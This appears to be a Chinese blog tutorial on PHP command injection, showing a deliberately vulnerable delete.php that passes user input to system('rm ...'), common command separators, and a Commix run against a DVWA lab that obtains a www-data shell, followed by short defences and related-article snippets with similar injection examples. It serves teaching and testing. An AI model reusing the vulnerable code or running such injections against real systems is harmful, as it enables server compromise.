阐述php命令执行漏洞的原理,命令执行漏洞原理及工具 - 安全工具篇

最新推荐文章于 2022-04-14 15:49:13 发布
最新推荐文章于 2022-04-14 15:49:13 发布
阅读量138 收藏
点赞数
文章标签: 阐述php命令执行漏洞的原理

Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。

如:delete.php文件内容

$file=$_GET['filename'];

system("rm $file");

?>

附: 常用命令执行符 : && ,& ,||,|,;

返回结果:

Please specify the name of the file to delete

uid=33(www-data) gid=33(www-data) groups=33(www-data)

很容易可以想到使用BurpSuite进行迭代测试。今天我们不讲BurpSuite,介绍另外一个命令执行漏洞工具:Commix。

Commix工具

Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。

下面给出一个拿shell的示例,DVWA版本v1.0.7:

root@kali:~/Desktop/commix# ./commix.py --url="http://10.0.2.5/dvwa/vulnerabilities/exec/index.php" --data="ip=127.0.0.1&submit=submit" --cookie="security=medium;PHPSESSID=5dfc75a69587ea8030902ac2547c4bab"

__

___ ___ ___ ___ ___ ___ /\_\ __ _

/`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ v2.9-dev#13

/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>

\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com

\/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--

Automated All-in-One OS Command Injection and Exploitation Tool

Copyright © 2014-2019 Anastasios Stasinopoulos (@ancst)

+--

(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

[*] Checking connection to the target URL... [ SUCCEED ]

[*] Setting the POST parameter 'ip' for tests.

[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]

[+] The POST parameter 'ip' seems injectable via (results-based) classic command injection technique.

[~] Payload: %26echo TDUYJF$((86+87))$(echo TDUYJF)TDUYJF

[?] Do you want a Pseudo-Terminal shell? [Y/n] > Y

Pseudo-Terminal (type '?' for available options)

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > pwd

/var/www/dvwa/vulnerabilities/exec

防止命令执行漏洞

1、过滤黑名单;

2、替换、转义关键字;

3、对于IP地址,可以以'.'为分界,将所有数字拆分到数组,单个判断是否为数字is_numeric()。

weixin_39633252
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令执行漏洞原理
BAIXUAN9527的博客
02-26 1876
命令执行漏洞原理: 在操作系统中, & 、&& 、| 、 || 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令 可以看到,low级别的代码接收了用户输入的ip,然后根据服务器是否是Windows NT系统,对目标ip进行不同的ping测试。但是这里对用户输入的ip并没有进行任何的过...
命令执行漏洞漏洞原理
Lyh0558的博客
04-13 1997
命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。 command1&command2 两个命令同时执行 command1&&command2 只有前面命令执行成功,后面命令才继续执行 command1;command2 不管前面命令执行成功没有,后面的命...
命令执行漏洞详解
热门推荐
weixin_42566218的博客
03-08 1万+
一、命令执行漏洞原理 在编写程序的时候,当碰到要执行系统命令来获取一些信息时,就要调用外部命令的函数,比如php中的exec()、system()等,如果这些函数的参数是由用户所提供的,那么恶意用户就可能通过构造命令拼接来执行额外系统命令,比如这样的代码 <?php system("ping -c 1 ".$_GET['ip']); ?> 程序的本意是让用户传入一个ip地址去测试网络连通性,但是由于参数不可控,当我们传入的ip参数为"127.0.0.1;id“时,执行命令就便成了
命令执行漏洞原理工具 - 安全工具
chiqiao5151的博客
04-19 928
Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。 如:delete.php文件内容 <?php $file=$_GET['filename']; system("rm $file"); ?> ...
阐述php命令执行漏洞原理,命令执行与代码执行漏洞原理
weixin_39928102的博客
04-12 188
注:本文仅供参考学习命令执行定义当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。形成原因脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调...
PHP反序列化漏洞详解.rar
02-07
下面将详细阐述PHP反序列化漏洞的相关知识点。 **1. PHP序列化与反序列化** - **序列化**:PHP的序列化是将变量转换为字符串的过程,便于存储或传输。序列化的结果是一个包含了变量类型、值以及任何与之相关的复杂...
Web应用安全:文件包含漏洞简介.pptx
06-18
下面将详细阐述文件包含漏洞的概念、原理、分类以及利用方式。 首先,什么是文件包含漏洞?当程序员将常用函数或代码块写入单独的文件,然后在需要的地方通过特定的函数(如PHP中的`include`、`require`等)来调用...
利用SQL注入漏洞登录后台的实现方法
09-11
本文将详细阐述SQL注入的原理、步骤以及如何通过一个实例演示其在登录后台中的应用。 一、SQL注入的基本步骤 1. **寻找注入点**:攻击者首先需要找到应用程序中与数据库交互的部分,通常是登录界面、搜索框、评论...
基于PHP的优优问答系统-微论坛v1.0.0源码.zip
01-13
下面将详细阐述PHP在构建这样一个问答系统中的关键技术和知识点。 1. **PHP基础**:PHP是一种广泛使用的开源服务器端脚本语言,尤其适合Web开发。在优优问答系统中,PHP用于处理用户请求、与数据库交互、动态生成...
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie+购物逻辑漏洞的学习等等)
最新发布
05-08
1. SQL注入:当用户输入的数据未经充分过滤或转义就直接用于SQL查询时,攻击者可能利用此漏洞执行恶意SQL命令。通过构造特定的输入,攻击者可以读取、修改甚至删除数据库中的敏感数据。例如,一个不安全的登录界面...
commix:自动化的多合一OS命令注入和利用工具
02-05
一般信息 Commix ([ comm ]和[ i ] jection e [ x ] ploiter的缩写)是由 ( )编写的自动化工具,可以从Web开发人员,渗透测试人员甚至安全研究人员处使用,以测试Web-基于应用程序的视图,以查找与攻击相关的错误,错误或漏洞。 通过使用此工具,很容易在某些易受攻击的参数或HTTP标头中查找和利用命令注入漏洞。 法律免责声明 对于每次混合运行,最终用户必须同意以下前言: (!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is
命令执行漏洞原理和测试
LAngle9的博客
03-24 1066
PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。 条件:用户能够控制函数输入,存在可以执行代码的危险函数。 命令执行漏洞产生原因: 开发人员没有对特殊函数入口做过滤,导致用户可以提交恶意代码并提交服务端执行。 Web服务器没有过滤危险函数导致命令执行漏洞攻击成功。 命令执行漏洞带来的危害: 继承Web服务程序的权限去执行系统命令或读写文件。 反...
渗透测试技术----常见web漏洞--命令执行原理及防御
wwl012345的博客
08-15 2629
一、命令执行漏洞介绍 1.命令执行漏洞简介 命令执行漏洞时指服务器没有对执行命令进行过滤,用户可以随意执行系统命令命令执行漏洞属于高危漏洞之一,也属于代码执行的范围内。 2.命令执行漏洞原理 应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用System()、exec()、shell_exec()、passthru()、popen()、proc_popen()等函数可以执行...
九、漏洞挖掘与代码审计(5)命令执行漏洞原理
weixin_45540609的博客
05-28 673
一、命令执行漏洞原理 用户输入数据被当做系统命令执行 <?php system('whoani')?> 其实这个一句话木马的本质就是命令执行漏洞 代码执行:用户输入数据被当做后端代码执行 命令执行:用户输入数据被当做系统命令执行 因为代码执行情况下,可以调用命令执行函数,所以大部分代码执行都可以调用系统命令,菜刀中断操作也是利用命令执行函数,命令执行也可以写文件的方法获得webshell 命令行写入文件 二、命令执行函数解析 1、system('whoa...
命令执行漏洞漏洞原理,如何防御命令执行漏洞?代码执行漏洞命令执行漏洞有什么区别?
DXfighting_的博客
04-14 1400
原理:程序应用有时需要调用一些执行系统命令的西数,如PHP中的system、exec、shell.exec,passthru、popensproc.popen等,当用户能控制这些西数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,命令执行漏洞产生的原因1.由手开发人员编写源码时,没有针对代码中可执行的特殊西数入口做过滤,导致客户端可以提交悉意构造语句,并提交服务端执行2.命令注入攻击中,web服务器没有过滤类似system、eval和exec等西数,是该漏洞攻击成功的主要原因 ..
s2 安恒 漏洞验证工具_【Struts2命令代码执行漏洞分析系列】 S2001
weixin_42370320的博客
12-26 1091
漏洞信息:漏洞信息页面:https://cwiki.apache.org/confluence/display/WW/S2-001漏洞成因官方概述:Remote code exploit on form validation error漏洞影响:WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, St...
基础知识点|命令执行漏洞相关总结
weixin_42282189的博客
11-10 8225
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 命令执行漏洞是指攻击者可以随意执行系统命令。它属于高危漏洞之一,也属于代码执行的范畴。命令执行漏洞不仅仅存在于B/S架构中,在C/S架构中也常常遇到。 简单的说,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许使用者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码。 0x01 原理 命令执行漏洞是指应用有时.
任意命令执行
嘻嘻哈哈
01-12 2468
任意命令执行漏洞 1、简介 原理 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如php中的system、exec、shell_exec等,如果用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常的命令中,造成命令执行漏洞。 利用条件 应用调用执行系统命令的函数 将用户输入作为系统命令的参数拼接到了命令行中 常见的命令拼接符: &&
web安全学习笔记(六) 命令执行漏洞&&文件上传漏洞
qycc3391的博客
02-27 1465
0.前言 上文讲到了如何对OWASPBWA靶机的低、中安全级别下的文件上传漏洞的利用。本文讲讲述如何绕过高安全级别下的文件上传限制,以及如何利用命令执行漏洞。 1. 命令执行漏洞 部分web应用程序会调用底层的操作系统命令,例如,一些网站网站会提供一些ping命令的接口,用来测试网站在各地的ping的响应速度: 在我们搭建的靶机中,也存在类似的功能: 点击查看源码可以得知,当用户在命令框中输入...
PHP Web编程漏洞分析:SQL注入与检测方法
"本文主要探讨了PHP中的Web编程常见漏洞及检测方法,重点关注了魔术引号功能、SQL注入、文件上传、Cookie欺骗、XSS攻击、文件包含等安全问题,并阐述了这些漏洞的危害和原理。" 在PHP编程中,安全问题至关重要,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值